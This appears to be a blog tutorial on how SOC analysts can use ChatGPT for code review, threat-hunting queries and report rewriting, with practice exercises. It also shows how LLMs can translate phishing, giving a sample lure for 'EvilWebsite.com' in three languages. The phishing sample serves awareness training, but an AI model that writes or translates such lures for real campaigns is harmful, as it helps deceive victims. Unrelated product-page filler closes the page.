How to use ChatGPT as a SOC analyst

Aug 4, 2024
7 min read

How to use ChatGPT as a SOC analyst?

This KB will discuss what ChatGPT is, a disclaimer for use, and how to use it as a SOC analyst. This is How to use ChatGPT as a SOC analyst?

What Is ChatGPT?

ChatGPT is the best chatbot humans have ever seen. There are all sorts of fancy words to describe how it works, like the Large Language Model (LLM), or Generative Pre-trained Transformer (GPT), or Machine Learning Driven Research Stealing Internet Models Without Giving Credit to People (MLDRSIMGCP). I just made the last one up but it sounds right. It’s designed for natural language understanding and generation. You can interact with ChatGPT to ask questions, get information, converse, or seek assistance. The model has been trained on various Internet texts, allowing it to respond to multiple queries. And it’s useful, but limited.

It’s important to note that while ChatGPT can provide helpful and informative responses, it may not always be perfectly accurate or contextually appropriate.

Almost everything about being an SOC analyst is in real time. ChatGPT 3.5 cannot give you information about website reputation, IP reputation, file reputations, whois information, or any other steps described in The SOC Analyst Method. At the time of this writing, the data used by ChatGPT is only current up to January 2022. Since most indicators of compromise have a short shelf life, it is out of the question to use ChatGPT to verify the reputation of IOCs.

But there are a few applications for ChatGPT that you will find very relevant as a new SOC analyst, which can help springboard your career and lessen the water from the firehose you’ll drink in the first year.

Disclaimer on Terms of Service for ChatGPT

No one ever reads the terms of service for a product, but you might want to glance over ChatGPT's if you find yourself working for a company and decide to use ChatGPT to analyze some code found on a computer you’re investigating. OpenAI, which created ChatGPT, now has that code saved on its systems. You might ask, “So what?” The code triggered an alert, and you were just doing your job, right? In this scenario, what if you worked for a software company and the code is part of an app under development that hasn’t been released to the public, and you’ve inadvertently given it away to OpenAI? Therefore, some companies have policies against using ChatGPT and other LLM AI models. Before using ChatGPT for official business, be sure to understand your organization’s stance on using it.

With that said, let’s have some fun.

Code Review

ChatGPT knows what malicious code looks like with some degree of certainty, and it knows how to analyze it for vulnerabilities, but likely not better than tools designed for this task. You might find an occasion to paste a script into ChatGPT and have it explain its context and nature to you without reading it line by line, even if you know the language. You can also ask if it looks malicious, and take the information it gives you to study it further. This is particularly helpful to an analyst when analyzing PowerShell from your endpoint tool, or perhaps JavaScript from an IPS alert. When you see those alerts, you can pop the script into ChatGPT and ask questions about it. But the reality is, this would rarely be practiced in the real world. If you’re seeing it now, then your endpoint tool, IPS, WAF, or whatever has already alerted you that it looks malicious, and those tools should be used first as a source of truth because that’s what they specialize in. However, if the tools don’t give you enough information, pasting it into ChatGPT might give you additional insight.

EXERCISE ONE
Go to https://github.com/explore and find a random, publicly available piece of code and copy it into the ChatGPT message bar and ask, “What does the above code do?”

This will give you an example of how ChatGPT can be used effortlessly. It doesn’t matter if the code is 20 lines or 500 lines long; ChatGPTwill explain the purpose of the code in simple language.

File Paths

You might find an opportunity to paste a file path into ChatGPT to have it determine if it belongs to a legitimate application. Let’s consider that this data is two years old, so it can only be used to check what it’s seen before, not as evidence that something is malicious because the file path is anomalous. New files come out daily that are entirely legitimate, and old files get new file paths. Sometimes, it’s worth a quick check to confirm a file is in the correct place.

EXERCISE TWO
Go to ChatGPTand type in:

“Is this file path malicious C:\WINDOWS\System32\Wbem”

“What file path does Malwarebytes typically install to?”

Creating Queries for SOC Analysts

ChatGPT can be used to write YARA rules, Suricata rules, KQL queries, SPL queries, and many other syntaxes for threat hunting or creating rules or alerts. This is the most effective and helpful way to leverage ChatGPT as an analyst. It does this fairly well; you can describe what you want it to find in natural language. This can be extremely helpful to you as a new SOC analyst because you likely need to gain familiarity with these tools to create custom threat hunts or alerts yourself. It may require editing, but it’s much easier than starting from scratch.

EXERCISE THREE
Go to ChatGPT and tell it, "Write a Splunk query that shows me all logs that contain hashes from all indexes"

Enter that query into Splunk and the result is all the malware that we've captured so far in the cyber range.  


- Take the hash and go to VirusTotal and enter it in the search.

- Take the hash and Google it for sandbox results.

- Any interesting websites with information about it on Google?



1. What is the name of the tool or malware that this hash relates to?

2. What do you think the attacker was looking for?

EXERCISE FOUR
Go to ChatGPT and tell it, "Write a Splunk query that creates a table of the most source ip addresses descending order over the past 24 hours." 

Be sure to read the ChatGPT output and change "src_ip" to "src". 

- Take the IP addresses and go to VirusTotal and enter it in.  
- Take the IP addresses and go to IPVoid and enter it in.  
- Now Google the IP address and see what open source intelligence you can gleam
- Now do a whois on the IP address to get context on who owns it.

1. Do you think this IP address is malicious?  

2. Are there any other things hosted at this IP address?  

3. How long do you think this IP address has been used this way?

Rewriting

One useful function, especially to those writing in their non-native languages, is the ability to leverage ChatGPT to rewrite your sentences. Report writing and rewriting summaries from the SOC Analyst Method are valuable to us as the SOC is often a global workplace. English might not always be our first language, or even if it is, it may benefit you to have ChatGPT make a write-up. I gave it details and asked it to write a formal Root Cause Analysis (RCA). With minimal editing afterward, I could deliver it to a customer, saving time. But be careful, as sometimes ChatGPT can misconstrue the meaning behind your words and add ambiguity and vagueness where there was once clarity. You may be surprised at the result but don’t let it misinterpret your findings.

EXERCISE FIVE
Ask ChatGPT to rewrite the Declaration of Independence. 

Would you allow ChatGPT to rewrite things without approval?

ChatGPT as a Weapon

We’ve discussed how ChatGPT can aid junior Analysts in their day-to-day work; now, let’s talk about how bad actors can use it for malicious means. In a previous article, we spoke of phishing. To recap, phishing is a crafted email meant for a user to visit an evil website or download a malicious file. Historically, one of the tell-tell signs of a phishing email is typos or grammatical errors. This was because English is likely a second language for the person crafting the email. Now, through the magic of LLMs and ChatGPT, an attacker can write an email in their native language, give it to ChatGPT, and ask it to be translated into any language they want with better accuracy than traditional translators. Let’s give it a try; the following is a short phishing email I wrote in English.

“Hello, EvilWebsite.com is committed to providing you with the best possible shopping experience. Our website features the latest products from top brands, and we regularly offer discounts and promotions to help you save money. Click the link below for free shipping on your first order.”

Now, let’s see what ChatGPT outputs when I ask for it to be written in Spanish.

“Hola, EvilWebsite.com está comprometido a ofrecerte la mejor experiencia de compra posible. Nuestro sitio web presenta los últimos productos de las mejores marcas, y regularmente ofrecemos descuentos y promociones para ayudarte a ahorrar dinero. Haz clic en el enlace de abajo para obtener envío gratuito en tu primer pedido.”

How about German?

"Hallo, EvilWebsite.com ist dazu verpflichtet, Ihnen das bestmögliche Einkaufserlebnis zu bieten. Unsere Webseite bietet die neuesten Produkte von Top-Marken, und wir bieten regelmäßig Rabatte und Aktionen an, um Ihnen zu helfen, Geld zu sparen. Klicken Sie auf den untenstehenden Link für kostenlosen Versand bei Ihrer ersten Bestellung.”

Regardless of the language, ChatGPT can convert it with minimal effort. Overall, OpenAI has done an excellent job of making ChatGPT a safe tool. In the early days of ChatGPT, someone could have ChatGPT write simple scripts that could destroy a computer’s filesystem. However, ChatGPT is one of many LLM AIs on the Internet. At DEF CON 31, there were multiple demonstrations of locally hosted LLMs that were trained to develop malicious code or run a malware Command and Control server. As AI progresses, we will continue to see it used by hacking groups and scammers.

Summary

While ChatGPT is relatively straightforward, knowing when to use it is a little more complex. As we’ve discussed, it does not contain real-time information, limiting its value to us as SOC analysts. Its most valuable use case is that it can write queries for you in languages you haven’t likely come across yet, making security analysis tools faster and more accessible. As ChatGPT continues to improve, even adding the ability to search the Internet, it will increase in relevance to us. However, it will still be limited in the data it can reach without tool licenses. Rewriting is another function of ChatGPT that can help with communication as the SOC is a global workplace, often with challenging barriers for those whose first language isn’t English. Lastly, you can always query ChatGPT for general information about cybersecurity as you would Google. For example, what a particular Windows Event ID might be, and it might save a few minutes of standard Internet searching when it delivers the correct answer immediately.

All-in-one: Record Player, CD, Cassette, Radio

16 px collapsible text is perfect for longer content like paragraphs and descriptions. It’s a great way to give people more information while keeping your layout clean. Link your text to anything, including an external website or a different page. You can set your text box to expand and collapse when people click, so they can read more or less info.

$124.99